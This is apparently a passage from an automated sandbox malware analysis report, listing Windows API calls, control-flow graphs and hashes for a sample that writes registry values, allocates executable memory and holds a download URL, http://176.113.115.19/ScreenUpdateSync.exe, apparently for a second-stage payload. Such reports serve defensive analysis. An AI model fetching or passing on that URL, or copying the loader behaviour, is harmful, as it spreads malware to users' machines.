                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::_Cnd_initX.LIBCPMT ref: 00405812
                                                                                                                                                                                                                                • __Cnd_signal.LIBCPMT ref: 0040581E
                                                                                                                                                                                                                                • std::_Cnd_initX.LIBCPMT ref: 00405833
                                                                                                                                                                                                                                • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 0040583A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2059591211-0
                                                                                                                                                                                                                                • Opcode ID: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                                                                                                                                                                                • Instruction ID: aebd2ac95218272d728fe4b8aabd0d06745c53d3a4d3bf2acc4ab23466c53149
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FF082324007009BE7313772C80770A77A0AF04319F54883EF456769E2DBBEA8585A5D

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 415 402956-4029c1 call 426820 call 42a33b call 42b444 call 402819 424 4029c3-4029c6 415->424 425 4029cf-4029e9 call 404329 call 40f8c5 415->425 424->425 426 4029c8-4029cc 424->426 426->425 428 4029ce 426->428 428->425
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00402985
                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 00402995
                                                                                                                                                                                                                                  • Part of subcall function 00402819: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004028FC
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                                                                                                                                                                • String ID: +@
                                                                                                                                                                                                                                • API String ID: 2843524283-4068139069
                                                                                                                                                                                                                                • Opcode ID: c4372d71d1af2a683dbfcdd1665cb533e7f75167211033e386056ce4ddc1eda8
                                                                                                                                                                                                                                • Instruction ID: 360ce0a8eae9c999d09f2756f3db8bce049cda3fb2da0c45bd643548fbd10a56
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4372d71d1af2a683dbfcdd1665cb533e7f75167211033e386056ce4ddc1eda8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F901D6B1E0011C5ADB24EA25ED46AEF77689B41308F1401BBA605E31C1D9785E45CA99

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 0042DFCA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorExitLastThread
                                                                                                                                                                                                                                • String ID: <(@
                                                                                                                                                                                                                                • API String ID: 1611280651-4189137628
                                                                                                                                                                                                                                • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                                                                                                                                                • Instruction ID: e0787552ab8efb8db6d324a59155cd7370fffab00d3424d568e81b2c5b813918
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7EF0A471A00614AFDB04EFB1D80AA6D3B70FF09715F10056AF40257292CB7969558B68

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 452 42e104-42e10f 453 42e111-42e123 call 42eab9 call 42a58d 452->453 454 42e125-42e138 call 42e0bb 452->454 466 42e175-42e178 453->466 460 42e166 454->460 461 42e13a-42e157 CreateThread 454->461 465 42e168-42e174 call 42e02d 460->465 463 42e179-42e17e 461->463 464 42e159-42e165 GetLastError call 42ea83 461->464 469 42e180-42e183 463->469 470 42e185-42e187 463->470 464->460 465->466 469->470 470->465
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateThread.KERNEL32(?,?,Function_0002DFB0,00000000,?,?), ref: 0042E14D
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,0040CF04,00000000,00000000,?,?,00000000,?), ref: 0042E159
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 0042E160
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2744730728-0
                                                                                                                                                                                                                                • Opcode ID: 7111d36ae7d9c15de437581cc3a8b466686a4c726987840fc25d61e653133f3e
                                                                                                                                                                                                                                • Instruction ID: 0446f91cba5bc1877a5460ce95bae766c471c3d01d015a917539d7ef00797947
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7111d36ae7d9c15de437581cc3a8b466686a4c726987840fc25d61e653133f3e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF01D236600139BBDB119FA3FC05AAF7B6AEF85720F40003AF80582210DB358D21C7A9

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 473 434745-43475d call 439911 476 434770-434786 SetFilePointerEx 473->476 477 43475f-434764 call 42eab9 473->477 479 434797-4347a1 476->479 480 434788-434795 GetLastError call 42ea83 476->480 484 43476a-43476e 477->484 483 4347a3-4347b8 479->483 479->484 480->484 485 4347bd-4347c2 483->485 484->485
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDCB,00000000,00000002,0040DDCB,00000000,?,?,?,004347F4,00000000,00000000,0040DDCB,00000002), ref: 0043477E
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,004347F4,00000000,00000000,0040DDCB,00000002,?,0042C151,?,00000000,00000000,00000001,?,0040DDCB,?,0042C206), ref: 00434788
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 0043478F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2336955059-0
                                                                                                                                                                                                                                • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                                                                                                                                                • Instruction ID: 754c6ade6be4612c7e0c4d55d151f31ddb378772f23eed9c1438f533fa7de6e2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92012836710114ABDB159FAADC058EE7B2AEFCA721F24020AF81597290EB74ED528794

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 487 402ba3-402bcf RegCreateKeyExW 488 402bd1-402be3 RegSetValueExW 487->488 489 402be5-402be8 487->489 488->489 490 402bf3-402bf9 489->490 491 402bea-402bed RegCloseKey 489->491 491->490
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BC5
                                                                                                                                                                                                                                • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BDD
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BED
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseCreateValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1818849710-0
                                                                                                                                                                                                                                • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                                                                                                                                                • Instruction ID: 504cdbf1e8d79b6d7283afc99896261950e1a919ac783b79018d19fe3f3d7e53
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16F0B4B650011CFFEB214F94DD89DABBA7CEB047E9F100175FA01B2150D6B19E009664

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 492 42e064-42e071 call 431f4e 495 42e073-42e076 ExitThread 492->495 496 42e07c-42e084 492->496 496->495 497 42e086-42e08a 496->497 498 42e091-42e097 497->498 499 42e08c call 4354e6 497->499 501 42e0a4-42e0aa 498->501 502 42e099-42e09b 498->502 499->498 501->495 504 42e0ac-42e0ae 501->504 502->501 503 42e09d-42e09e CloseHandle 502->503 503->501 504->495 505 42e0b0-42e0ba FreeLibraryAndExitThread 504->505
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00431F4E: GetLastError.KERNEL32(?,?,?,0042EABE,00434D6C,?,00431EF8,00000001,00000364,?,0042DFD5,00457910,00000010), ref: 00431F53
                                                                                                                                                                                                                                  • Part of subcall function 00431F4E: _free.LIBCMT ref: 00431F88
                                                                                                                                                                                                                                  • Part of subcall function 00431F4E: SetLastError.KERNEL32(00000000), ref: 00431FBC
                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 0042E076
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,0042E196,?,?,0042E00D,00000000), ref: 0042E09E
                                                                                                                                                                                                                                • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E196,?,?,0042E00D,00000000), ref: 0042E0B4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1198197534-0
                                                                                                                                                                                                                                • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                                                                                                                                                • Instruction ID: fd9bad38e730a393213bf68ec19d44fd98ecce05ba50bc9e79acb20fd3a4735a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CF05E342006347BEB319F37EC08A5B7A98AF05725F584756B924C22A1DBBCDD82869C

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 506 402394-4023a2 507 402557-402559 PostQuitMessage 506->507 508 4023a8-4023ad 506->508 509 40255f-402564 507->509 510 4023c6-4023cd 508->510 511 4023af-4023c1 DefWindowProcW 508->511 512 4023d4-4023db 510->512 513 4023cf call 401d9a 510->513 511->509 512->509 515 4023e1-402555 call 4010ba call 4029ea 512->515 513->512 515->509
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 004023BB
                                                                                                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 00402559
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessagePostProcQuitWindow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3873111417-0
                                                                                                                                                                                                                                • Opcode ID: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                                                                                                                                                                                • Instruction ID: bf68dd1ed3332b821989bb5fb7b10a9ee1776f212d734df2d08f0bb157d40bf1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A412D11A64380A5E630FFA5BC55B2533B0FF54712F10653BE524DB2B6E3B28544C75E
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNEL32(00001562), ref: 00401562
                                                                                                                                                                                                                                  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                                                                                                                                                  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _wcslen$Sleep
                                                                                                                                                                                                                                • String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                • API String ID: 3358372957-3120454669
                                                                                                                                                                                                                                • Opcode ID: 7701b78b2553ec30eafcf5b5a8124595c597b4782acb6499a108b1673ff50c75
                                                                                                                                                                                                                                • Instruction ID: 7c00d7bba67f06605ca45885bb35db497ce8a02c3eee20c143d632ed8421155e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7701b78b2553ec30eafcf5b5a8124595c597b4782acb6499a108b1673ff50c75
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49317955A6538094E330DFA0BC56B252370FF64B52F50653BD60CCB2B2E7A18587C75E
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000400,?,?,02140223,?,?), ref: 02140E19
                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,02140223,?,?), ref: 02140E1E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                • Instruction ID: 418359fe583fdca0451b961dad85c986a59d45351fffe631a80bdbc895422709
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FD0123114512877D7002B95DC09BCD7B1CDF09B66F108011FB0DE9080CB70954046E5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                                • Instruction ID: bbb5b7410918ed3a19f08aeefc1504024edbbdc2131895f71ed4605d11f41fec
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB51E971A00214AFDB10DF59C844BEA7BA1EFC9364F19929AF8099B391C735FD42CB94
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: __fread_nolock
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2638373210-0
                                                                                                                                                                                                                                • Opcode ID: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
                                                                                                                                                                                                                                • Instruction ID: 4d174249788eeb6afcd1119ee109bea02bf0543b951493d32b1ba631c5db93a5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18319CB1604716AFC710DE2AC88091ABFA8BF84351F04853EFC44A7391D779EA548BCA
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004028FC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 323602529-0
                                                                                                                                                                                                                                • Opcode ID: 72fdb1b190d3a1d2d7d6c29d22f11b53277dfea25eaf381d8fe65a68052a5e16
                                                                                                                                                                                                                                • Instruction ID: a96161e1099ed2e4ebc89c8b3bfd47f038f5993eec498a984b7603ffbfb0c6fe
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72fdb1b190d3a1d2d7d6c29d22f11b53277dfea25eaf381d8fe65a68052a5e16
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8312BB4D002199BDB14EFA5D881AEDBBB4BF48304F5085AEE415B3281DB786A48CF54
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: H_prolog3_catch
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3886170330-0
                                                                                                                                                                                                                                • Opcode ID: ccf9f932eb112f7f3215526f30a1f7312533cc0aacad866aa3aa8a24b0442ac4
                                                                                                                                                                                                                                • Instruction ID: df22ffae6d2fe3b800e0c8e4f2770173a5e1bd04bbee8454eb0c8e7fe139aa3e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ccf9f932eb112f7f3215526f30a1f7312533cc0aacad866aa3aa8a24b0442ac4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1215B70A00205EFCB15DF55C484EAEBBB5BF88705F14816EE805AB3A1C778AE50DF94
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: __wsopen_s
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3347428461-0
                                                                                                                                                                                                                                • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                                • Instruction ID: ab2784c25bcc6a383b761dc233afc1089a93ea485bdb2d241c4dcfca41164893
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2511487590420AAFCF05DF58E94199B7BF4FF48314F10406AF808AB311D770EA11CBA9
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                                                                                                                                                • Instruction ID: 35ea3ad1aa6a7a88a67b465f5c451a9d93fb5bd3893c922deb476a376b6bfb46
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3EF0BE33810008BBCF115E96DC01DDF3B6EEF8D339F100116F914921A0DB3ACA22ABA4
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                                                                                                                                                • Instruction ID: eec6a97fd20e662809c0c25a02e68f43ccf4a0d84c2e20558320e6cd2c3c69d0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CE0E5213006207FDA303F675C06B5B36489F49BBAF142137AC06927D1DB2CEE0085ED
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004103B7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Exception@8Throw
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2005118841-0
                                                                                                                                                                                                                                • Opcode ID: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
                                                                                                                                                                                                                                • Instruction ID: 7514a9331385c8c8780a364a21f4f069850cbfc0a8d6a65b648f56ba84841e90
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75E02B3050020DB3CB147665FC1185D777C5A10318BA04237BC28A14D1DF78E59DC48D
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,00000000,?,0043D0D5,?,?,00000000,?,0043D0D5,00000000,0000000C), ref: 0043CD17
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                                                                                                                                                • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00783AD6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3954477135.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_783000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                • String ID:
